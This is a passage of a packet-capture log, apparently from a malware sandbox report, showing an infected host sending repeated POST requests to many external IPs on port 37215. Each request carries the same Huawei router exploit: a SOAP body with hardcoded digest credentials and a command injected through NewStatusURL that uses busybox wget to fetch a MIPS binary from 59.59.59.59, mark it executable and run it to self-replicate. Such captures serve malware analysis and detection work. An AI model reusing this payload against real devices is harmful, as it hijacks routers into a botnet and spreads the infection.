                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          491192.168.2.1545624197.153.146.10737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605029106 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          492192.168.2.154602441.48.113.5237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605099916 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          493192.168.2.1535726155.162.63.737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605108976 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          494192.168.2.154916641.8.228.13737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605134964 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          495192.168.2.1549356157.120.3.10237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605154037 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          496192.168.2.1539438197.20.63.5137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605175972 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          497192.168.2.1560444197.83.163.18337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605197906 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          498192.168.2.1548128197.214.198.17537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605212927 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          499192.168.2.1551822157.58.29.19137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605228901 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          500192.168.2.1535328157.216.39.9737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:49.605278015 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
